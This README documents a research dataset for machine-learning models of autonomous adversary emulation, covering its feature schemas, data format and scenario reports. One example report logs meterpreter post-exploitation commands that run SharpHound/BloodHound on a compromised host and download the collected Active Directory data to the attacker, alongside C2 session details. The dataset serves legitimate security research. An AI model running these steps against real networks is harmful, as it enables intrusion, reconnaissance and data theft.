Dataset used for An Evaluation of Machine Learning Models for Autonomous Adversary Emulation

The dataset in this repository is released to facilitate research on autonomous adversary emulation. It was gathered by running Lore scenarios against an emulated IT environment. For a full description, please see paper X. For seven action categories, a number of (feature, reward) samples are recorded. The task is to predict the reward from the features.

For any questions about the dataset, please contact blinded-author.

Directory structure

The ActionCategory names used in this repository correspond to the following, more descriptive names in the paper:

ActionCategory                 Paper name
CredentialHarvesting           Shellcode to extract credentials
General                        General
MetasploitLocalExploit         Local exploits
MetasploitPost                 Miscellaneous shellcode
MetasploitServerExploit        Server exploits
MetasploitStandardAuxiliary    Auxiliary
NetworkScanning                Network scanning
OnlinePasswordGuessing         Online password guessing
PasswordCracking               Password cracking

.
├── evaluation
│   ├── crate_envs              - description of the environment used
│   ├── lore_reports            - description of carried out actions for the scenarios
│   └── lore_scenarios          - description of config files for the scenarios
└── training
    ├── crate_envs              - description of the environment used
    ├── lore_reports            - description of carried out actions for the scenarios
    ├── lore_scenarios          - description of config files for the scenarios
    └── ml_training_samples
        ├── MetasploitPost                      - action category
        │   ├── feature_schema.json             - feature space description
        │   └── dataset_compressed_for_ml.json  - (features, reward) samples
        ├── NetworkScanning
        │   ├── feature_schema.json
        │   └── dataset_compressed_for_ml.json
        └── ...                                 - other action categories, same layout

The training directory contains the samples that can be used for training ML models. The evaluation directory contains data about the tests used for a secondary evaluation of the trained models, carried out on a different IT environment and with a different Lore scenario configuration.
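As a starting point, the layout above can be walked to find the action categories that ship training samples. This is a minimal sketch, not part of the released tooling: the function name find_action_categories and the repo_root argument are illustrative, and only the directory and file names come from the listing above.

```python
from pathlib import Path

# File names taken from the directory listing above.
SCHEMA_NAME = "feature_schema.json"
DATASET_NAME = "dataset_compressed_for_ml.json"


def find_action_categories(repo_root):
    """Map each action category name to its (schema path, dataset path).

    Only subdirectories of training/ml_training_samples that contain both
    files are returned. repo_root is wherever the repository was unpacked
    (an assumption of this sketch).
    """
    samples_dir = Path(repo_root) / "training" / "ml_training_samples"
    categories = {}
    for entry in sorted(samples_dir.iterdir()):
        schema = entry / SCHEMA_NAME
        dataset = entry / DATASET_NAME
        if entry.is_dir() and schema.is_file() and dataset.is_file():
            categories[entry.name] = (schema, dataset)
    return categories
```

Calling find_action_categories(".") from the repository root should then return one entry per category directory, which is convenient when a separate model is trained per category.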

File descriptions: training

Each action category has its own feature space, which means that a separate model is essentially required for each category. The feature space is described in feature_schema.json; an excerpt is explained below. The structure of dataset_compressed_for_ml.json is also explained below.

NetworkScanning - feature_schema.json

A subset of the feature groups, and of the features within them, for the NetworkScanning category is shown below. Feature types are integers (either categorical or regular), floats, booleans and arrays.

{
    "properties": {
        "ConcernedAbstractAction": {    <---- feature group
            "type": "object",
            "properties": {
                "concerned_abstract_action": {  <--- feature in feature group
                    "type": "integer",  <---- feature type
                    "description": "One hot encoding (index) of the chosen action uid.",    <--- signifies categorical value
                    "minimum": 0,       <--- bounds for the values 
                    "maximum": 5533
                }
            }
        },
        "PreviousActionAttempts": {
            "type": "object",
            "properties": {
                "action_type_previous_tests_count": {
                    "type": "integer",
                    "description": "The number of times the action type has been used during the scenario session." <--- i.e. not categorical
                },
                "action_type_percent_successful": {
                    "type": "float",
                    "description": "The percentage of attempts that the action type has been successful during the scenario session.",
                    "minimum": 0,
                    "maximum": 1
                },
            }
        },
        "ActionBuilderDependencies": {
            "type": "object",
            "description": "Action builder dependencies.",
            "properties": {
                "action_builder_dependency_0": {
                    "type": "array",    <--- signifies multiple values for this feature
                    "items": {
                        "type": "float"
                    },
                    "minItems": 20,     <--- length of array, currently minItems=maxItems for all arrays
                    "maxItems": 20
                },
            }
        },
        "OverallTypeOfOperatingSystem": {
            "type": "object",
            "properties": {
                "os_type": {    <--- another example of categorical feature
                    "type": "integer",
                    "description": "One hot encoding index of overall kind of operating system.",
                    "minimum": 0,
                    "maximum": 3
                }
            }
        },
        "AttackerAndVictimOnTheSameSubnet": {
            "type": "object",
            "properties": {
                "attacker_and_victim_on_the_same_subnet": {
                    "type": "boolean",      <--- can also be simple boolean
                    "description": "If the attacker has access to resources on the same LAN as the victim, and thus can send traffic to it without worrying as much about firewall/nids rulesets etc."
                }
            }
        }
    }
}
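The schema excerpt above can be summarised programmatically, for example to see which features are categorical and how many values each contributes per sample. The following is a minimal sketch under stated assumptions: describe_features is an illustrative helper, and treating an integer as categorical when its description mentions "One hot encoding" is a heuristic derived from the annotations in the excerpt, not a documented rule.

```python
def describe_features(schema):
    """Return one (group, feature, kind, width) tuple per feature.

    kind is a heuristic label; width is the number of values the feature
    contributes per sample (minItems for arrays, otherwise 1).
    """
    rows = []
    for group_name, group in schema["properties"].items():
        for feature_name, spec in group.get("properties", {}).items():
            ftype = spec.get("type")
            description = spec.get("description", "")
            if ftype == "array":
                kind, width = "array", spec.get("minItems", 1)
            elif ftype == "integer" and "one hot" in description.lower():
                # Assumption: categorical integers are marked by this phrase.
                kind, width = "categorical", 1
            else:
                kind, width = ftype, 1
            rows.append((group_name, feature_name, kind, width))
    return rows


# A cut-down schema with the same shape as the excerpt above.
example_schema = {
    "properties": {
        "ConcernedAbstractAction": {
            "type": "object",
            "properties": {
                "concerned_abstract_action": {
                    "type": "integer",
                    "description": "One hot encoding (index) of the chosen action uid.",
                    "minimum": 0,
                    "maximum": 5533,
                }
            },
        },
        "ActionBuilderDependencies": {
            "type": "object",
            "properties": {
                "action_builder_dependency_0": {
                    "type": "array",
                    "items": {"type": "float"},
                    "minItems": 20,
                    "maxItems": 20,
                }
            },
        },
        "AttackerAndVictimOnTheSameSubnet": {
            "type": "object",
            "properties": {
                "attacker_and_victim_on_the_same_subnet": {"type": "boolean"}
            },
        },
    }
}

for row in describe_features(example_schema):
    print(row)
```

For a real file, the schema dict would come from json.load on the category's feature_schema.json. How categorical indices are then encoded (one-hot vectors, embeddings, or left as integers) is a modelling choice that the schema does not prescribe.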

NetworkScanning - dataset_compressed_for_ml.json

Each dataset_compressed_for_ml.json has the same structure: a results key holding a list of rewards and a features key holding the features. The features dict mirrors the structure of feature_schema.json, with each feature stored as a list of values. The n-th value in each feature list corresponds to the n-th reward.

{
    "results": [ float, float, float, float, ... ],
    "features": {
        "ConcernedAbstractAction": {    <---- feature group
            "concerned_abstract_action": [0, 0, 4300, 0, ...],
        },
        "PreviousActionAttempts": {
            "action_type_previous_tests_count": [1, 0, 0, 100, ...],
            "action_type_percent_successful": [0.0, 0.2, 0.0, 0.1, ...],
        },
        "ActionBuilderDependencies": {
            # list of lists of length 20 (as described by feature schema)
            "action_builder_dependency_0": [[0, 0, ...], [0, 0, ...]],
        },
        "OverallTypeOfOperatingSystem": {
            "os_type": [0, 0, 3, 1, ...],
        },
        "AttackerAndVictimOnTheSameSubnet": {
            "attacker_and_victim_on_the_same_subnet": [0, 1, 0, 1, ...],
        }
    }
}
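Because the file stores one list per feature, most ML libraries need it transposed into one feature vector per sample. The sketch below shows one way to do that with the standard library only. The helper name to_rows and the toy values are illustrative and not taken from the dataset; categorical indices are passed through unchanged.

```python
def to_rows(dataset):
    """Turn the column-wise layout into one flat feature vector per sample.

    Returns (rows, rewards), where rows[i] belongs to rewards[i].
    """
    rewards = dataset["results"]
    columns = []  # (qualified feature name, per-sample values)
    for group_name, group in dataset["features"].items():
        for feature_name, values in group.items():
            if len(values) != len(rewards):
                raise ValueError(
                    f"{group_name}.{feature_name}: {len(values)} values "
                    f"for {len(rewards)} rewards"
                )
            columns.append((f"{group_name}.{feature_name}", values))

    rows = []
    for i in range(len(rewards)):
        row = []
        for _, values in columns:
            value = values[i]
            if isinstance(value, list):
                row.extend(float(v) for v in value)  # array feature
            else:
                row.append(float(value))  # integer, float or boolean
        rows.append(row)
    return rows, list(rewards)


# Toy input with two samples; arrays shortened to length 3 for readability.
toy = {
    "results": [1.0, 0.0],
    "features": {
        "PreviousActionAttempts": {
            "action_type_previous_tests_count": [1, 0],
            "action_type_percent_successful": [0.0, 0.2],
        },
        "ActionBuilderDependencies": {
            "action_builder_dependency_0": [[0, 1, 0], [1, 0, 0]],
        },
    },
}

X, y = to_rows(toy)
print(X)
print(y)
```

The length check guards against the one property the format relies on, namely that every feature list is aligned with the results list.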

Descriptive information: lore_reports

The .json files in the lore_reports directories contain the summary reports that Lore produced for the actions carried out during each executed scenario. Each report summarises one executed action. Two example reports are given below.

{
    "action_category": "Metasploit",
    "action_description": "Determine what local users exist via the SAM RPC service",
    "action_info": {
        "attacker": "134.23.2.150:",
        "target": "134.23.4.44:"
    },
    "action_outcome": "SUCCESSFUL",
    "action_uid": "auxiliary/scanner/smb/smb_enumusers",
    "c2_info": null,
    "mitre_att&ck": {
        "tactics": [
            "TA0007"
        ],
        "techniques": [
            "T1087"
        ]
    },
    "time_end": "2024-06-05 04:23:36",
    "time_start": "2024-06-05 04:23:32"
},
{
    "action_category": "Metasploit.Shellcode",
    "action_description": "Runs BloodHound on a compromised machine as a powershell script (SharpHound.ps1) through a meterpreter session. A session can be matched either by the info-field, address-field, exploit field or session key.",
    "action_info": {
        "commands": [
            "mkdir c:\\\\temp\\\\",
            "load powershell",
            "powershell_import /mnt/sved/tools/SharpHound.ps1",
            "powershell_execute 'Invoke-BloodHound -CollectionMethod All -JSONFolder c:\\\\temp\\\\ -ZipFileName bh_404372.zip'",
            "download c:\\\\temp\\\\bh_404372.zip /mnt/sved/lore/scenarios/Tyrdemo_insider_ANN_1_session_4/reports/bh_404372.zip"
        ],
        "target": "hq01.office.tyrdemo.se"
    },
    "action_outcome": "SUCCESSFUL",
    "action_uid": "BloodHound",
    "c2_info": {
        "active_since": "2024-06-05 04:03:49",
        "established_via": "exploit/multi/handler",
        "shell_type": "meterpreter",
        "shell_user": "system",
        "tunnel_in": "134.23.2.150:8081",
        "tunnel_out": "134.23.3.11:50235"
    },
    "mitre_att&ck": {
        "tactics": [
            "TA0007"
        ],
        "techniques": [
            "T1087.001",
            "T1087.002",
            "T1069.002",
            "T1615",
            "T1018",
            "T1201"
        ]
    },
    "time_end": "2024-06-05 04:05:54",
    "time_start": "2024-06-05 04:05:04"
}

The reports in the evaluation directory are complete, i.e., they cover all Lore scenarios that were carried out. The reports in the training directory cover only a subset of the 923 Lore scenarios executed during training.
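The reports lend themselves to simple aggregate statistics, such as outcome counts per action category and total execution time. The following is a minimal sketch that assumes the reports have already been parsed into a list of dicts with the keys shown in the examples above. The helper name summarise_reports is illustrative, and how the reports are grouped inside each .json file is not covered here.

```python
from collections import Counter
from datetime import datetime

TIME_FORMAT = "%Y-%m-%d %H:%M:%S"  # matches the timestamps in the examples


def summarise_reports(reports):
    """Count (action_category, action_outcome) pairs and sum the durations."""
    outcomes = Counter()
    total_seconds = 0.0
    for report in reports:
        outcomes[(report["action_category"], report["action_outcome"])] += 1
        start = datetime.strptime(report["time_start"], TIME_FORMAT)
        end = datetime.strptime(report["time_end"], TIME_FORMAT)
        total_seconds += (end - start).total_seconds()
    return outcomes, total_seconds


# The two example reports above, reduced to the fields used here.
example_reports = [
    {
        "action_category": "Metasploit",
        "action_outcome": "SUCCESSFUL",
        "time_start": "2024-06-05 04:23:32",
        "time_end": "2024-06-05 04:23:36",
    },
    {
        "action_category": "Metasploit.Shellcode",
        "action_outcome": "SUCCESSFUL",
        "time_start": "2024-06-05 04:05:04",
        "time_end": "2024-06-05 04:05:54",
    },
]

outcomes, total_seconds = summarise_reports(example_reports)
print(outcomes)
print(total_seconds)
```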

Descriptive information: crate_envs

The crate_envs directories include descriptive information regarding the IT environments used for the scenarios.

Descriptive information: lore_scenarios

The lore_scenarios directories include the Lore configuration files used for the scenarios.